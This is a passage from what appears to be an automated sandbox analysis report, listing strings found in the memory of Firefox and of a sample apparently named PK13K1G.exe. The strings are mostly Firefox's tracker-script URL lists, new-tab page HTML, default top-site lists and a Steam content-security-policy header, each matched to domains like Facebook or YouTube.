"://static.chartbeat.com/js/chartbeat.js", "://static.chartbeat.com/js/chartbeat_video.js", "://static.criteo.net/js/ld/publishertag.js", "://.imgur.com/js/vendor..bundle.js", "://.imgur.io/js/vendor..bundle.js", "://www.rva311.com/static/js/main..chunk.js", "://web-assets.toggl.com/app/assets/scripts/.js", "://libs.coremetrics.com/eluminate.js", "://connect.facebook.net//sdk.js", "://connect.facebook.net//all.js", "://secure.cdn.fastclick.net/js/cnvr-launcher//launcher-stub.min.js", "://www.google-analytics.com/analytics.js", "://www.google-analytics.com/gtm/js", "://www.googletagmanager.com/gtm.js", "://www.google-analytics.com/plugins/ua/ec.js", "://ssl.google-analytics.com/ga.js", "://s0.2mdn.net/instream/html5/ima3.js", "://imasdk.googleapis.com/js/sdkloader/ima3.js", "://www.googleadservices.com/pagead/conversion_async.js", "://www.googletagservices.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/gpt/pubads_impl_.js", "://securepubads.g.doubleclick.net/tag/js/gpt.js", "://securepubads.g.doubleclick.net/gpt/pubads_impl_.js", "://script.ioam.de/iam.js", "://cdn.adsafeprotected.com/iasPET.1.js", "://static.adsafeprotected.com/iasPET.1.js", "://adservex.media.net/videoAds.js", "://.moatads.com//moatad.js", "://.moatads.com//moatapi.js", "://.moatads.com//moatheader.js", "://.moatads.com//yi.js", "://.imrworldwide.com/v60.js", "://cdn.optimizely.com/js/.js", "://cdn.optimizely.com/public/.js", "://id.rambler.ru/rambler-id-helper/auth_events.js", "://media.richrelevance.com/rrserver/js/1.2/p13n.js", "://www.gstatic.com/firebasejs//firebase-messaging.js", "://.vidible.tv//vidible-min.js", "://vdb-cdn-files.s3.amazonaws.com//vidible-min.js", "://js.maxmind.com/js/apis/geoip2//geoip2.js", "://s.webtrends.com/js/advancedLinkTracking.js", "://s.webtrends.com/js/webtrends.js", "://s.webtrends.com/js/webtrends.min.js"] equals www.facebook.com (Facebook)
Source: firefox.exe, 00000017.00000002.2622599068.000001324935F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ["://webcompat-addon-testbed.herokuapp.com/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js", "://track.adform.net/serving/scripts/trackpoint/", "://track.adform.net/serving/scripts/trackpoint/async/", "://.adnxs.com//ast.js", "://.adnxs.com//pb.js", "://.adnxs.com//prebid", "://www.everestjs.net/static/st.v3.js", "://static.adsafeprotected.com/vans-adapter-google-ima.js", "://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "://cdn.branch.io/branch-latest.min.js", "://pub.doubleverify.com/signals/pub.js", "://c.amazon-adsystem.com/aax2/apstag.js", "://auth.9c9media.ca/auth/main.js", "://static.chartbeat.com/js/chartbeat.js", "://static.chartbeat.com/js/chartbeat_video.js", "://static.criteo.net/js/ld/publishertag.js", "://.imgur.com/js/vendor..bundle.js", "://.imgur.io/js/vendor..bundle.js", "://www.rva311.com/static/js/main..chunk.js", "://web-assets.toggl.com/app/assets/scripts/.js", "://libs.coremetrics.com/eluminate.js", "://connect.facebook.net//sdk.js", "://connect.facebook.net//all.js", "://secure.cdn.fastclick.net/js/cnvr-launcher//launcher-stub.min.js", "://www.google-analytics.com/analytics.js", "://www.google-analytics.com/gtm/js", "://www.googletagmanager.com/gtm.js", "://www.google-analytics.com/plugins/ua/ec.js", "://ssl.google-analytics.com/ga.js", "://s0.2mdn.net/instream/html5/ima3.js", "://imasdk.googleapis.com/js/sdkloader/ima3.js", "://www.googleadservices.com/pagead/conversion_async.js", "://www.googletagservices.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/gpt/pubads_impl_.js", "://securepubads.g.doubleclick.net/tag/js/gpt.js", "://securepubads.g.doubleclick.net/gpt/pubads_impl_.js", "://script.ioam.de/iam.js", "://cdn.adsafeprotected.com/iasPET.1.js", "://static.adsafeprotected.com/iasPET.1.js", "://adservex.media.net/videoAds.js", "://.moatads.com//moatad.js", "://.moatads.com//moatapi.js", "://.moatads.com//moatheader.js", "://.moatads.com//yi.js", "://.imrworldwide.com/v60.js", "://cdn.optimizely.com/js/.js", "://cdn.optimizely.com/public/.js", "://id.rambler.ru/rambler-id-helper/auth_events.js", "://media.richrelevance.com/rrserver/js/1.2/p13n.js", "://www.gstatic.com/firebasejs//firebase-messaging.js", "://.vidible.tv//vidible-min.js", "://vdb-cdn-files.s3.amazonaws.com//vidible-min.js", "://js.maxmind.com/js/apis/geoip2//geoip2.js", "://s.webtrends.com/js/advancedLinkTracking.js", "://s.webtrends.com/js/webtrends.js", "://s.webtrends.com/js/webtrends.min.js"] equals www.rambler.ru (Rambler)
Source: firefox.exe, 00000017.00000002.2654959105.000001324EB07000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [{incognito:null, tabId:null, types:["image"], urls:["://track.adform.net/Serving/TrackPoint/", "://pixel.advertising.com/firefox-etp", "://.advertising.com/.js", "://.advertising.com/", "://securepubads.g.doubleclick.net/gampad/ad-blk", "://pubads.g.doubleclick.net/gampad/ad-blk", "://securepubads.g.doubleclick.net/gampad/xml_vmap1", "://pubads.g.doubleclick.net/gampad/xml_vmap1", "://vast.adsafeprotected.com/vast", "://securepubads.g.doubleclick.net/gampad/xml_vmap2", "://pubads.g.doubleclick.net/gampad/xml_vmap2", "://securepubads.g.doubleclick.net/gampad/ad", "://pubads.g.doubleclick.net/gampad/ad", "://www.facebook.com/platform/impression.php", "https://ads.stickyadstv.com/firefox-etp", "://ads.stickyadstv.com/auto-user-sync", "://ads.stickyadstv.com/user-matching", "https://static.adsafeprotected.com/firefox-etp-pixel", "://.adsafeprotected.com/.gif", "://.adsafeprotected.com/.png", "://.adsafeprotected.com/.js", "://.adsafeprotected.com//adj", "://.adsafeprotected.com//imp/", "://.adsafeprotected.com//Serving/", "://.adsafeprotected.com//unit/", "://.adsafeprotected.com/jload", "://.adsafeprotected.com/jload?", "://.adsafeprotected.com/jsvid", "://.adsafeprotected.com/jsvid?", "://.adsafeprotected.com/mon", "://.adsafeprotected.com/tpl", "://.adsafeprotected.com/tpl?", "://.adsafeprotected.com/services/pub", "://.adsafeprotected.com/"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 00000017.00000002.2654959105.000001324EB07000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [{incognito:null, tabId:null, types:["imageset"], urls:["://track.adform.net/Serving/TrackPoint/", "://pixel.advertising.com/firefox-etp", "://.advertising.com/.js", "://.advertising.com/", "://securepubads.g.doubleclick.net/gampad/ad-blk", "://pubads.g.doubleclick.net/gampad/ad-blk", "://securepubads.g.doubleclick.net/gampad/xml_vmap1", "://pubads.g.doubleclick.net/gampad/xml_vmap1", "://vast.adsafeprotected.com/vast", "://securepubads.g.doubleclick.net/gampad/xml_vmap2", "://pubads.g.doubleclick.net/gampad/xml_vmap2", "://securepubads.g.doubleclick.net/gampad/ad", "://pubads.g.doubleclick.net/gampad/ad", "://www.facebook.com/platform/impression.php", "https://ads.stickyadstv.com/firefox-etp", "://ads.stickyadstv.com/auto-user-sync", "://ads.stickyadstv.com/user-matching", "https://static.adsafeprotected.com/firefox-etp-pixel", "://.adsafeprotected.com/.gif", "://.adsafeprotected.com/.png", "://.adsafeprotected.com/.js", "://.adsafeprotected.com//adj", "://.adsafeprotected.com//imp/", "://.adsafeprotected.com//Serving/", "://.adsafeprotected.com//unit/", "://.adsafeprotected.com/jload", "://.adsafeprotected.com/jload?", "://.adsafeprotected.com/jsvid", "://.adsafeprotected.com/jsvid?", "://.adsafeprotected.com/mon", "://.adsafeprotected.com/tpl", "://.adsafeprotected.com/tpl?", "://.adsafeprotected.com/services/pub", "://.adsafeprotected.com/"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 00000017.00000002.2622599068.0000013249356000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["://webcompat-addon-testbed.herokuapp.com/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js", "://track.adform.net/serving/scripts/trackpoint/", "://track.adform.net/serving/scripts/trackpoint/async/", "://.adnxs.com//ast.js", "://.adnxs.com//pb.js", "://.adnxs.com//prebid", "://www.everestjs.net/static/st.v3.js", "://static.adsafeprotected.com/vans-adapter-google-ima.js", "://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "://cdn.branch.io/branch-latest.min.js", "://pub.doubleverify.com/signals/pub.js", "://c.amazon-adsystem.com/aax2/apstag.js", "://auth.9c9media.ca/auth/main.js", "://static.chartbeat.com/js/chartbeat.js", "://static.chartbeat.com/js/chartbeat_video.js", "://static.criteo.net/js/ld/publishertag.js", "://.imgur.com/js/vendor..bundle.js", "://.imgur.io/js/vendor..bundle.js", "://www.rva311.com/static/js/main..chunk.js", "://web-assets.toggl.com/app/assets/scripts/.js", "://libs.coremetrics.com/eluminate.js", "://connect.facebook.net//sdk.js", "://connect.facebook.net//all.js", "://secure.cdn.fastclick.net/js/cnvr-launcher//launcher-stub.min.js", "://www.google-analytics.com/analytics.js", "://www.google-analytics.com/gtm/js", "://www.googletagmanager.com/gtm.js", "://www.google-analytics.com/plugins/ua/ec.js", "://ssl.google-analytics.com/ga.js", "://s0.2mdn.net/instream/html5/ima3.js", "://imasdk.googleapis.com/js/sdkloader/ima3.js", "://www.googleadservices.com/pagead/conversion_async.js", "://www.googletagservices.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/gpt/pubads_impl_.js", "://securepubads.g.doubleclick.net/tag/js/gpt.js", "://securepubads.g.doubleclick.net/gpt/pubads_impl_.js", "://script.ioam.de/iam.js", "://cdn.adsafeprotected.com/iasPET.1.js", "://static.adsafeprotected.com/iasPET.1.js", "://adservex.media.net/videoAds.js", "://.moatads.com//moatad.js", "://.moatads.com//moatapi.js", "://.moatads.com//moatheader.js", "://.moatads.com//yi.js", "://.imrworldwide.com/v60.js", "://cdn.optimizely.com/js/.js", "://cdn.optimizely.com/public/.js", "://id.rambler.ru/rambler-id-helper/auth_events.js", "://media.richrelevance.com/rrserver/js/1.2/p13n.js", "://www.gstatic.com/firebasejs//firebase-messaging.js", "://.vidible.tv//vidible-min.js", "://vdb-cdn-files.s3.amazonaws.com//vidible-min.js", "://js.maxmind.com/js/apis/geoip2//geoip2.js", "://s.webtrends.com/js/advancedLinkTracking.js", "://s.webtrends.com/js/webtrends.js", "://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 00000017.00000002.2622599068.0000013249356000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["://webcompat-addon-testbed.herokuapp.com/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js", "://track.adform.net/serving/scripts/trackpoint/", "://track.adform.net/serving/scripts/trackpoint/async/", "://.adnxs.com//ast.js", "://.adnxs.com//pb.js", "://.adnxs.com//prebid", "://www.everestjs.net/static/st.v3.js", "://static.adsafeprotected.com/vans-adapter-google-ima.js", "://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "://cdn.branch.io/branch-latest.min.js", "://pub.doubleverify.com/signals/pub.js", "://c.amazon-adsystem.com/aax2/apstag.js", "://auth.9c9media.ca/auth/main.js", "://static.chartbeat.com/js/chartbeat.js", "://static.chartbeat.com/js/chartbeat_video.js", "://static.criteo.net/js/ld/publishertag.js", "://.imgur.com/js/vendor..bundle.js", "://.imgur.io/js/vendor..bundle.js", "://www.rva311.com/static/js/main..chunk.js", "://web-assets.toggl.com/app/assets/scripts/.js", "://libs.coremetrics.com/eluminate.js", "://connect.facebook.net//sdk.js", "://connect.facebook.net//all.js", "://secure.cdn.fastclick.net/js/cnvr-launcher//launcher-stub.min.js", "://www.google-analytics.com/analytics.js", "://www.google-analytics.com/gtm/js", "://www.googletagmanager.com/gtm.js", "://www.google-analytics.com/plugins/ua/ec.js", "://ssl.google-analytics.com/ga.js", "://s0.2mdn.net/instream/html5/ima3.js", "://imasdk.googleapis.com/js/sdkloader/ima3.js", "://www.googleadservices.com/pagead/conversion_async.js", "://www.googletagservices.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/gpt/pubads_impl_.js", "://securepubads.g.doubleclick.net/tag/js/gpt.js", "://securepubads.g.doubleclick.net/gpt/pubads_impl_.js", "://script.ioam.de/iam.js", "://cdn.adsafeprotected.com/iasPET.1.js", "://static.adsafeprotected.com/iasPET.1.js", "://adservex.media.net/videoAds.js", "://.moatads.com//moatad.js", "://.moatads.com//moatapi.js", "://.moatads.com//moatheader.js", "://.moatads.com//yi.js", "://.imrworldwide.com/v60.js", "://cdn.optimizely.com/js/.js", "://cdn.optimizely.com/public/.js", "://id.rambler.ru/rambler-id-helper/auth_events.js", "://media.richrelevance.com/rrserver/js/1.2/p13n.js", "://www.gstatic.com/firebasejs//firebase-messaging.js", "://.vidible.tv//vidible-min.js", "://vdb-cdn-files.s3.amazonaws.com//vidible-min.js", "://js.maxmind.com/js/apis/geoip2//geoip2.js", "://s.webtrends.com/js/advancedLinkTracking.js", "://s.webtrends.com/js/webtrends.js", "://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 00000017.00000002.2654959105.000001324EB07000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [{incognito:null, tabId:null, types:["xmlhttprequest"], urls:["://track.adform.net/Serving/TrackPoint/", "://pagead2.googlesyndication.com/pagead/.jsfcd=true", "://pagead2.googlesyndication.com/pagead/js/.jsfcd=true", "://pixel.advertising.com/firefox-etp", "://cdn.cmp.advertising.com/firefox-etp", "://.advertising.com/.js", "://.advertising.com/", "://securepubads.g.doubleclick.net/gampad/ad-blk", "://pubads.g.doubleclick.net/gampad/ad-blk", "://securepubads.g.doubleclick.net/gampad/xml_vmap1", "://pubads.g.doubleclick.net/gampad/xml_vmap1", "://vast.adsafeprotected.com/vast", "://securepubads.g.doubleclick.net/gampad/xml_vmap2", "://pubads.g.doubleclick.net/gampad/xml_vmap2", "://securepubads.g.doubleclick.net/gampad/ad", "://pubads.g.doubleclick.net/gampad/ad", "://www.facebook.com/platform/impression.php", "https://ads.stickyadstv.com/firefox-etp", "://ads.stickyadstv.com/auto-user-sync", "://ads.stickyadstv.com/user-matching", "https://static.adsafeprotected.com/firefox-etp-pixel", "https://static.adsafeprotected.com/firefox-etp-js", "://.adsafeprotected.com/.gif", "://.adsafeprotected.com/.png", "://.adsafeprotected.com/.js", "://.adsafeprotected.com//adj", "://.adsafeprotected.com//imp/", "://.adsafeprotected.com//Serving/", "://.adsafeprotected.com//unit/", "://.adsafeprotected.com/jload", "://.adsafeprotected.com/jload?", "://.adsafeprotected.com/jsvid", "://.adsafeprotected.com/jsvid?", "://.adsafeprotected.com/mon", "://.adsafeprotected.com/tpl", "://.adsafeprotected.com/tpl?", "://.adsafeprotected.com/services/pub", "://.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 00000017.00000002.2707167925.0000013255355000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000017.00000002.2707167925.0000013255355000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: PK13K1G.exe, 00000008.00000003.2551839737.0000000000E61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: firefox.exe, 00000017.00000002.2620149903.0000013248903000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: doff-text" data-l10n-args="{"engine": "Google"}"></div><input type="search" class="fake-editable" tabindex="-1" aria-hidden="true"/><div class="fake-caret"></div></button></div></div></div><div class="body-wrapper on"><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div><div class="ds-top-sites"><section class="collapsible-section top-sites" data-section-id="topsites"><div class="section-top-bar"><h3 class="section-title-container " style="visibility:hidden"><span class="section-title"><span data-l10n-id="newtab-section-header-topsites"></span></span><span class="learn-more-link-wrapper"></span></h3></div><div><ul class="top-sites-list"><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.youtube.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="Y"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/youtube-com@2x.png)"></div></div></div><div class="title"><span dir="auto">YouTube<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{"title":"YouTube"}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.facebook.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="F"><div class="top-site-icon rich-icon" style="backgroun
Source: firefox.exe, 00000017.00000002.2620149903.0000013248903000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: doff-text" data-l10n-args="{"engine": "Google"}"></div><input type="search" class="fake-editable" tabindex="-1" aria-hidden="true"/><div class="fake-caret"></div></button></div></div></div><div class="body-wrapper on"><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div><div class="ds-top-sites"><section class="collapsible-section top-sites" data-section-id="topsites"><div class="section-top-bar"><h3 class="section-title-container " style="visibility:hidden"><span class="section-title"><span data-l10n-id="newtab-section-header-topsites"></span></span><span class="learn-more-link-wrapper"></span></h3></div><div><ul class="top-sites-list"><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.youtube.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="Y"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/youtube-com@2x.png)"></div></div></div><div class="title"><span dir="auto">YouTube<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{"title":"YouTube"}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.facebook.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="F"><div class="top-site-icon rich-icon" style="backgroun
Source: firefox.exe, 00000017.00000002.2649004262.000001324D811000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2622599068.00000132493DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000017.00000002.2704916068.0000013255095000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2701121751.0000013254E88000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000017.00000002.2704916068.0000013255095000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2701121751.0000013254E88000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000017.00000002.2649004262.000001324D811000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2622599068.00000132493DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000017.00000002.2649004262.000001324D811000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2622599068.00000132493DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000017.00000002.2622599068.00000132493DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/getCanStageUpdates - unable to apply updates because another instance of the application is already handling updates for this installation. equals www.facebook.com (Facebook)
Source: firefox.exe, 00000017.00000002.2622599068.00000132493DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/getCanStageUpdates - unable to apply updates because another instance of the application is already handling updates for this installation. equals www.youtube.com (Youtube)
Source: firefox.exe, 00000017.00000002.2649004262.000001324D811000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2622599068.0000013249375000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000017.00000002.2649004262.000001324D811000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2622599068.0000013249375000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000017.00000002.2649004262.000001324D811000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2622599068.0000013249375000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000017.00000002.2649004262.000001324D811000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2622599068.0000013249375000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000017.00000002.2649004262.000001324D811000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2622599068.0000013249375000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000017.00000002.2649004262.000001324D811000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2622599068.0000013249375000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000017.00000002.2649004262.000001324D811000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2622599068.0000013249375000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000017.00000002.2649004262.000001324D811000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000017.00000002.2649004262.000001324D811000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000017.00000002.2649004262.000001324D811000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000017.00000002.2649004262.000001324D811000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000017.00000002.2649004262.000001324D811000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000017.00000002.2649004262.000001324D811000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
